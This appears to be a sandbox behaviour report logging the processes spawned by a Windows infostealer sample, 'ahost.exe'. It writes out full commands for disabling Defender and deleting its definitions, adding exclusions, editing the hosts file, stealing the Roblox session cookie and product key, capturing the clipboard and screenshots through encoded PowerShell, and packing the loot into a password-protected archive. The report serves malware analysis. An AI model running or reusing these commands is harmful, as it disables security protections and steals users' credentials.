              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -AllJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Users\user\Desktop\ahost.exe "C:\Users\user\Desktop\ahost.exe"Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ahost.exe'"Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\p92x0.zip" *"Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ahost.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -AllJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permissions and try again.', 0, 'Access Denied', 48+16);close()"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LISTJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ohbt5slp\ohbt5slp.cmdline"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES46FF.tmp" "c:\Users\user\AppData\Local\Temp\ohbt5slp\CSC3D7213846C3143A1A5A1261A2A30979.TMP"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\p92x0.zip" *
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaaga